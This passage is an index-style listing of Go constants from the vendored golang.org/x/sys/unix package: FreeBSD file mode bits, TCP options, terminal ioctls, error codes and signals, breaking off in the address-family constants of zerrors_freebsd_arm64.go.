S_IFIFO = 0x1000 constant S_IFLNK (line 1503) | S_IFLNK = 0xa000 constant S_IFMT (line 1504) | S_IFMT = 0xf000 constant S_IFREG (line 1505) | S_IFREG = 0x8000 constant S_IFSOCK (line 1506) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1507) | S_IFWHT = 0xe000 constant S_IREAD (line 1508) | S_IREAD = 0x100 constant S_IRGRP (line 1509) | S_IRGRP = 0x20 constant S_IROTH (line 1510) | S_IROTH = 0x4 constant S_IRUSR (line 1511) | S_IRUSR = 0x100 constant S_IRWXG (line 1512) | S_IRWXG = 0x38 constant S_IRWXO (line 1513) | S_IRWXO = 0x7 constant S_IRWXU (line 1514) | S_IRWXU = 0x1c0 constant S_ISGID (line 1515) | S_ISGID = 0x400 constant S_ISTXT (line 1516) | S_ISTXT = 0x200 constant S_ISUID (line 1517) | S_ISUID = 0x800 constant S_ISVTX (line 1518) | S_ISVTX = 0x200 constant S_IWGRP (line 1519) | S_IWGRP = 0x10 constant S_IWOTH (line 1520) | S_IWOTH = 0x2 constant S_IWRITE (line 1521) | S_IWRITE = 0x80 constant S_IWUSR (line 1522) | S_IWUSR = 0x80 constant S_IXGRP (line 1523) | S_IXGRP = 0x8 constant S_IXOTH (line 1524) | S_IXOTH = 0x1 constant S_IXUSR (line 1525) | S_IXUSR = 0x40 constant TAB0 (line 1526) | TAB0 = 0x0 constant TAB3 (line 1527) | TAB3 = 0x4 constant TABDLY (line 1528) | TABDLY = 0x4 constant TCIFLUSH (line 1529) | TCIFLUSH = 0x1 constant TCIOFF (line 1530) | TCIOFF = 0x3 constant TCIOFLUSH (line 1531) | TCIOFLUSH = 0x3 constant TCION (line 1532) | TCION = 0x4 constant TCOFLUSH (line 1533) | TCOFLUSH = 0x2 constant TCOOFF (line 1534) | TCOOFF = 0x1 constant TCOON (line 1535) | TCOON = 0x2 constant TCPOPT_EOL (line 1536) | TCPOPT_EOL = 0x0 constant TCPOPT_FAST_OPEN (line 1537) | TCPOPT_FAST_OPEN = 0x22 constant TCPOPT_MAXSEG (line 1538) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1539) | TCPOPT_NOP = 0x1 constant TCPOPT_PAD (line 1540) | TCPOPT_PAD = 0x0 constant TCPOPT_SACK (line 1541) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_PERMITTED (line 1542) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SIGNATURE (line 1543) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1544) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_WINDOW (line 1545) | TCPOPT_WINDOW = 0x3 constant TCP_BBR_ACK_COMP_ALG (line 1546) | TCP_BBR_ACK_COMP_ALG = 0x448 constant TCP_BBR_ALGORITHM (line 1547) | TCP_BBR_ALGORITHM = 0x43b constant TCP_BBR_DRAIN_INC_EXTRA (line 1548) | TCP_BBR_DRAIN_INC_EXTRA = 0x43c constant TCP_BBR_DRAIN_PG (line 1549) | TCP_BBR_DRAIN_PG = 0x42e constant TCP_BBR_EXTRA_GAIN (line 1550) | TCP_BBR_EXTRA_GAIN = 0x449 constant TCP_BBR_EXTRA_STATE (line 1551) | TCP_BBR_EXTRA_STATE = 0x453 constant TCP_BBR_FLOOR_MIN_TSO (line 1552) | TCP_BBR_FLOOR_MIN_TSO = 0x454 constant TCP_BBR_HDWR_PACE (line 1553) | TCP_BBR_HDWR_PACE = 0x451 constant TCP_BBR_HOLD_TARGET (line 1554) | TCP_BBR_HOLD_TARGET = 0x436 constant TCP_BBR_IWINTSO (line 1555) | TCP_BBR_IWINTSO = 0x42b constant TCP_BBR_LOWGAIN_FD (line 1556) | TCP_BBR_LOWGAIN_FD = 0x436 constant TCP_BBR_LOWGAIN_HALF (line 1557) | TCP_BBR_LOWGAIN_HALF = 0x435 constant TCP_BBR_LOWGAIN_THRESH (line 1558) | TCP_BBR_LOWGAIN_THRESH = 0x434 constant TCP_BBR_MAX_RTO (line 1559) | TCP_BBR_MAX_RTO = 0x439 constant TCP_BBR_MIN_RTO (line 1560) | TCP_BBR_MIN_RTO = 0x438 constant TCP_BBR_MIN_TOPACEOUT (line 1561) | TCP_BBR_MIN_TOPACEOUT = 0x455 constant TCP_BBR_ONE_RETRAN (line 1562) | TCP_BBR_ONE_RETRAN = 0x431 constant TCP_BBR_PACE_CROSS (line 1563) | TCP_BBR_PACE_CROSS = 0x442 constant TCP_BBR_PACE_DEL_TAR (line 1564) | TCP_BBR_PACE_DEL_TAR = 0x43f constant TCP_BBR_PACE_OH (line 1565) | TCP_BBR_PACE_OH = 0x435 constant TCP_BBR_PACE_PER_SEC (line 1566) | TCP_BBR_PACE_PER_SEC = 0x43e constant TCP_BBR_PACE_SEG_MAX (line 1567) | TCP_BBR_PACE_SEG_MAX = 0x440 constant TCP_BBR_PACE_SEG_MIN (line 1568) | TCP_BBR_PACE_SEG_MIN = 0x441 constant TCP_BBR_POLICER_DETECT (line 1569) | TCP_BBR_POLICER_DETECT = 0x457 constant TCP_BBR_PROBE_RTT_GAIN (line 1570) | TCP_BBR_PROBE_RTT_GAIN = 0x44d constant TCP_BBR_PROBE_RTT_INT (line 1571) | TCP_BBR_PROBE_RTT_INT = 0x430 constant TCP_BBR_PROBE_RTT_LEN (line 1572) | TCP_BBR_PROBE_RTT_LEN = 0x44e constant TCP_BBR_RACK_RTT_USE (line 1573) | TCP_BBR_RACK_RTT_USE = 0x44a constant TCP_BBR_RECFORCE (line 1574) | TCP_BBR_RECFORCE = 0x42c constant TCP_BBR_REC_OVER_HPTS (line 1575) | TCP_BBR_REC_OVER_HPTS = 0x43a constant TCP_BBR_RETRAN_WTSO (line 1576) | TCP_BBR_RETRAN_WTSO = 0x44b constant TCP_BBR_RWND_IS_APP (line 1577) | TCP_BBR_RWND_IS_APP = 0x42f constant TCP_BBR_SEND_IWND_IN_TSO (line 1578) | TCP_BBR_SEND_IWND_IN_TSO = 0x44f constant TCP_BBR_STARTUP_EXIT_EPOCH (line 1579) | TCP_BBR_STARTUP_EXIT_EPOCH = 0x43d constant TCP_BBR_STARTUP_LOSS_EXIT (line 1580) | TCP_BBR_STARTUP_LOSS_EXIT = 0x432 constant TCP_BBR_STARTUP_PG (line 1581) | TCP_BBR_STARTUP_PG = 0x42d constant TCP_BBR_TMR_PACE_OH (line 1582) | TCP_BBR_TMR_PACE_OH = 0x448 constant TCP_BBR_TSLIMITS (line 1583) | TCP_BBR_TSLIMITS = 0x434 constant TCP_BBR_TSTMP_RAISES (line 1584) | TCP_BBR_TSTMP_RAISES = 0x456 constant TCP_BBR_UNLIMITED (line 1585) | TCP_BBR_UNLIMITED = 0x43b constant TCP_BBR_USEDEL_RATE (line 1586) | TCP_BBR_USEDEL_RATE = 0x437 constant TCP_BBR_USE_LOWGAIN (line 1587) | TCP_BBR_USE_LOWGAIN = 0x433 constant TCP_BBR_USE_RACK_CHEAT (line 1588) | TCP_BBR_USE_RACK_CHEAT = 0x450 constant TCP_BBR_UTTER_MAX_TSO (line 1589) | TCP_BBR_UTTER_MAX_TSO = 0x452 constant TCP_CA_NAME_MAX (line 1590) | TCP_CA_NAME_MAX = 0x10 constant TCP_CCALGOOPT (line 1591) | TCP_CCALGOOPT = 0x41 constant TCP_CONGESTION (line 1592) | TCP_CONGESTION = 0x40 constant TCP_DATA_AFTER_CLOSE (line 1593) | TCP_DATA_AFTER_CLOSE = 0x44c constant TCP_DELACK (line 1594) | TCP_DELACK = 0x48 constant TCP_FASTOPEN (line 1595) | TCP_FASTOPEN = 0x401 constant TCP_FASTOPEN_MAX_COOKIE_LEN (line 1596) | TCP_FASTOPEN_MAX_COOKIE_LEN = 0x10 constant TCP_FASTOPEN_MIN_COOKIE_LEN (line 1597) | TCP_FASTOPEN_MIN_COOKIE_LEN = 0x4 constant TCP_FASTOPEN_PSK_LEN (line 1598) | TCP_FASTOPEN_PSK_LEN = 0x10 constant TCP_FUNCTION_BLK (line 1599) | TCP_FUNCTION_BLK = 0x2000 constant TCP_FUNCTION_NAME_LEN_MAX (line 1600) | TCP_FUNCTION_NAME_LEN_MAX = 0x20 constant TCP_INFO (line 1601) | TCP_INFO = 0x20 constant TCP_KEEPCNT (line 1602) | TCP_KEEPCNT = 0x400 constant TCP_KEEPIDLE (line 1603) | TCP_KEEPIDLE = 0x100 constant TCP_KEEPINIT (line 1604) | TCP_KEEPINIT = 0x80 constant TCP_KEEPINTVL (line 1605) | TCP_KEEPINTVL = 0x200 constant TCP_LOG (line 1606) | TCP_LOG = 0x22 constant TCP_LOGBUF (line 1607) | TCP_LOGBUF = 0x23 constant TCP_LOGDUMP (line 1608) | TCP_LOGDUMP = 0x25 constant TCP_LOGDUMPID (line 1609) | TCP_LOGDUMPID = 0x26 constant TCP_LOGID (line 1610) | TCP_LOGID = 0x24 constant TCP_LOG_ID_LEN (line 1611) | TCP_LOG_ID_LEN = 0x40 constant TCP_MAXBURST (line 1612) | TCP_MAXBURST = 0x4 constant TCP_MAXHLEN (line 1613) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1614) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1615) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1616) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1617) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1618) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1619) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1620) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1621) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1622) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1623) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1624) | TCP_NOPUSH = 0x4 constant TCP_PCAP_IN (line 1625) | TCP_PCAP_IN = 0x1000 constant TCP_PCAP_OUT (line 1626) | TCP_PCAP_OUT = 0x800 constant TCP_RACK_EARLY_RECOV (line 1627) | TCP_RACK_EARLY_RECOV = 0x423 constant TCP_RACK_EARLY_SEG (line 1628) | TCP_RACK_EARLY_SEG = 0x424 constant TCP_RACK_GP_INCREASE (line 1629) | TCP_RACK_GP_INCREASE = 0x446 constant TCP_RACK_IDLE_REDUCE_HIGH (line 1630) | TCP_RACK_IDLE_REDUCE_HIGH = 0x444 constant TCP_RACK_MIN_PACE (line 1631) | TCP_RACK_MIN_PACE = 0x445 constant TCP_RACK_MIN_PACE_SEG (line 1632) | TCP_RACK_MIN_PACE_SEG = 0x446 constant TCP_RACK_MIN_TO (line 1633) | TCP_RACK_MIN_TO = 0x422 constant TCP_RACK_PACE_ALWAYS (line 1634) | TCP_RACK_PACE_ALWAYS = 0x41f constant TCP_RACK_PACE_MAX_SEG (line 1635) | TCP_RACK_PACE_MAX_SEG = 0x41e constant TCP_RACK_PACE_REDUCE (line 1636) | TCP_RACK_PACE_REDUCE = 0x41d constant TCP_RACK_PKT_DELAY (line 1637) | TCP_RACK_PKT_DELAY = 0x428 constant TCP_RACK_PROP (line 1638) | TCP_RACK_PROP = 0x41b constant TCP_RACK_PROP_RATE (line 1639) | TCP_RACK_PROP_RATE = 0x420 constant TCP_RACK_PRR_SENDALOT (line 1640) | TCP_RACK_PRR_SENDALOT = 0x421 constant TCP_RACK_REORD_FADE (line 1641) | TCP_RACK_REORD_FADE = 0x426 constant TCP_RACK_REORD_THRESH (line 1642) | TCP_RACK_REORD_THRESH = 0x425 constant TCP_RACK_TLP_INC_VAR (line 1643) | TCP_RACK_TLP_INC_VAR = 0x429 constant TCP_RACK_TLP_REDUCE (line 1644) | TCP_RACK_TLP_REDUCE = 0x41c constant TCP_RACK_TLP_THRESH (line 1645) | TCP_RACK_TLP_THRESH = 0x427 constant TCP_RACK_TLP_USE (line 1646) | TCP_RACK_TLP_USE = 0x447 constant TCP_VENDOR (line 1647) | TCP_VENDOR = 0x80000000 constant TCSAFLUSH (line 1648) | TCSAFLUSH = 0x2 constant TIMER_ABSTIME (line 1649) | TIMER_ABSTIME = 0x1 constant TIMER_RELTIME (line 1650) | TIMER_RELTIME = 0x0 constant TIOCCBRK (line 1651) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1652) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1653) | TIOCCONS = 0x80047462 constant TIOCDRAIN (line 1654) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1655) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1656) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1657) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1658) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1659) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1660) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1661) | TIOCGPGRP = 0x40047477 constant TIOCGPTN (line 1662) | TIOCGPTN = 0x4004740f constant TIOCGSID (line 1663) | TIOCGSID = 0x40047463 constant TIOCGWINSZ (line 1664) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1665) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1666) | TIOCMBIS = 0x8004746c constant TIOCMGDTRWAIT (line 1667) | TIOCMGDTRWAIT = 0x4004745a constant TIOCMGET (line 1668) | TIOCMGET = 0x4004746a constant TIOCMSDTRWAIT (line 1669) | TIOCMSDTRWAIT = 0x8004745b constant TIOCMSET (line 1670) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1671) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1672) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1673) | TIOCM_CTS = 0x20 constant TIOCM_DCD (line 1674) | TIOCM_DCD = 0x40 constant TIOCM_DSR (line 1675) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1676) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1677) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1678) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1679) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1680) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1681) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1682) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1683) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1684) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1685) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1686) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1687) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1688) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1689) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1690) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1691) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1692) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1693) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1694) | TIOCPKT_STOP = 0x4 constant TIOCPTMASTER (line 1695) | TIOCPTMASTER = 0x2000741c constant TIOCSBRK (line 1696) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1697) | TIOCSCTTY = 0x20007461 constant TIOCSDRAINWAIT (line 1698) | TIOCSDRAINWAIT = 0x80047457 constant TIOCSDTR (line 1699) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1700) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1701) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1702) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1703) | TIOCSETD = 0x8004741b constant TIOCSIG (line 1704) | TIOCSIG = 0x2004745f constant TIOCSPGRP (line 1705) | TIOCSPGRP = 0x80047476 constant TIOCSTART (line 1706) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1707) | TIOCSTAT = 0x20007465 constant TIOCSTI (line 1708) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1709) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1710) | TIOCSWINSZ = 0x80087467 constant TIOCTIMESTAMP (line 1711) | TIOCTIMESTAMP = 0x40107459 constant TIOCUCNTL (line 1712) | TIOCUCNTL = 0x80047466 constant TOSTOP (line 1713) | TOSTOP = 0x400000 constant UTIME_NOW (line 1714) | UTIME_NOW = -0x1 constant UTIME_OMIT (line 1715) | UTIME_OMIT = -0x2 constant VDISCARD (line 1716) | VDISCARD = 0xf constant VDSUSP (line 1717) | VDSUSP = 0xb constant VEOF (line 1718) | VEOF = 0x0 constant VEOL (line 1719) | VEOL = 0x1 constant VEOL2 (line 1720) | VEOL2 = 0x2 constant VERASE (line 1721) | VERASE = 0x3 constant VERASE2 (line 1722) | VERASE2 = 0x7 constant VINTR (line 1723) | VINTR = 0x8 constant VKILL (line 1724) | VKILL = 0x5 constant VLNEXT (line 1725) | VLNEXT = 0xe constant VMIN (line 1726) | VMIN = 0x10 constant VQUIT (line 1727) | VQUIT = 0x9 constant VREPRINT (line 1728) | VREPRINT = 0x6 constant VSTART (line 1729) | VSTART = 0xc constant VSTATUS (line 1730) | VSTATUS = 0x12 constant VSTOP (line 1731) | VSTOP = 0xd constant VSUSP (line 1732) | VSUSP = 0xa constant VTIME (line 1733) | VTIME = 0x11 constant VWERASE (line 1734) | VWERASE = 0x4 constant WCONTINUED (line 1735) | WCONTINUED = 0x4 constant WCOREFLAG (line 1736) | WCOREFLAG = 0x80 constant WEXITED (line 1737) | WEXITED = 0x10 constant WLINUXCLONE (line 1738) | WLINUXCLONE = 0x80000000 constant WNOHANG (line 1739) | WNOHANG = 0x1 constant WNOWAIT (line 1740) | WNOWAIT = 0x8 constant WSTOPPED (line 1741) | WSTOPPED = 0x2 constant WTRAPPED (line 1742) | WTRAPPED = 0x20 constant WUNTRACED (line 1743) | WUNTRACED = 0x2 constant E2BIG (line 1748) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1749) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1750) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1751) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1752) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1753) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1754) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1755) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1756) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1757) | EBADMSG = syscall.Errno(0x59) constant EBADRPC (line 1758) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1759) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1760) | ECANCELED = syscall.Errno(0x55) constant ECAPMODE (line 1761) | ECAPMODE = syscall.Errno(0x5e) constant ECHILD (line 1762) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1763) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1764) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1765) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1766) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1767) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1768) | EDOM = syscall.Errno(0x21) constant EDOOFUS (line 1769) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1770) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1771) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1772) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1773) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1774) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1775) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1776) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1777) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1778) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1779) | EINPROGRESS = syscall.Errno(0x24) constant EINTEGRITY (line 1780) | EINTEGRITY = syscall.Errno(0x61) constant EINTR (line 1781) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1782) | EINVAL = syscall.Errno(0x16) constant EIO (line 1783) | EIO = syscall.Errno(0x5) constant EISCONN (line 1784) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1785) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1786) | ELAST = syscall.Errno(0x61) constant ELOOP (line 1787) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1788) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1789) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1790) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1791) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1792) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1793) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1794) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1795) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1796) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1797) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1798) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1799) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1800) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1801) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1802) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1803) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1804) | ENOLINK = syscall.Errno(0x5b) constant ENOMEM (line 1805) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1806) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1807) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1808) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1809) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1810) | ENOTBLK = syscall.Errno(0xf) constant ENOTCAPABLE (line 1811) | ENOTCAPABLE = syscall.Errno(0x5d) constant ENOTCONN (line 1812) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1813) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1814) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1815) | ENOTRECOVERABLE = syscall.Errno(0x5f) constant ENOTSOCK (line 1816) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1817) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1818) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1819) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1820) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1821) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1822) | EOWNERDEAD = syscall.Errno(0x60) constant EPERM (line 1823) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1824) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1825) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1826) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1827) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1828) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1829) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1830) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1831) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1832) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1833) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1834) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1835) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1836) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1837) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1838) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1839) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1840) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1841) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1842) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1843) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1844) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1845) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1846) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1847) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1852) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1853) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1854) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1855) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1856) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1857) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1858) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1859) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1860) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1861) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1862) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1863) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1864) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1865) | SIGKILL = syscall.Signal(0x9) constant SIGLIBRT (line 1866) | SIGLIBRT = syscall.Signal(0x21) constant SIGLWP (line 1867) | SIGLWP = syscall.Signal(0x20) constant SIGPIPE (line 1868) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1869) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1870) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1871) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1872) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1873) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1874) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1875) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1876) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1877) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1878) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1879) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1880) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1881) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1882) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1883) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1884) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1885) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1886) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_freebsd_arm64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x23 constant AF_ATM (line 16) | AF_ATM = 0x1e constant AF_BLUETOOTH (line 17) | AF_BLUETOOTH = 0x24 constant AF_CCITT (line 18) | AF_CCITT = 0xa constant AF_CHAOS (line 19) | AF_CHAOS = 0x5 constant AF_CNT (line 20) | AF_CNT = 0x15 constant AF_COIP (line 21) | AF_COIP = 0x14 constant AF_DATAKIT (line 22) | AF_DATAKIT = 0x9 constant AF_DECnet (line 23) | AF_DECnet = 0xc constant AF_DLI (line 24) | AF_DLI = 0xd constant AF_E164 (line 25) | AF_E164 = 0x1a constant AF_ECMA (line 26) | AF_ECMA = 0x8 constant AF_HYLINK (line 27) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 28) | AF_IEEE80211 = 0x25 constant AF_IMPLINK (line 29) | AF_IMPLINK = 0x3 constant AF_INET (line 30) | AF_INET = 0x2 constant AF_INET6 (line 31) | AF_INET6 = 0x1c constant AF_INET6_SDP (line 32) | AF_INET6_SDP = 0x2a constant AF_INET_SDP (line 33) | AF_INET_SDP = 0x28 constant AF_IPX (line 34) | AF_IPX = 0x17 constant AF_ISDN (line 35) | AF_ISDN = 0x1a constant AF_ISO (line 36) | AF_ISO = 0x7 constant AF_LAT (line 37) | AF_LAT = 0xe constant AF_LINK (line 38) | AF_LINK = 0x12 constant AF_LOCAL (line 39) | AF_LOCAL = 0x1 constant AF_MAX (line 40) | AF_MAX = 0x2a constant AF_NATM (line 41) | AF_NATM = 0x1d constant AF_NETBIOS (line 42) | AF_NETBIOS = 0x6 constant AF_NETGRAPH (line 43) | AF_NETGRAPH = 0x20 constant AF_OSI (line 44) | AF_OSI = 0x7 constant AF_PUP (line 45) | AF_PUP = 0x4 constant AF_ROUTE (line 46) | AF_ROUTE = 0x11 constant AF_SCLUSTER (line 47) | AF_SCLUSTER = 0x22 constant AF_SIP 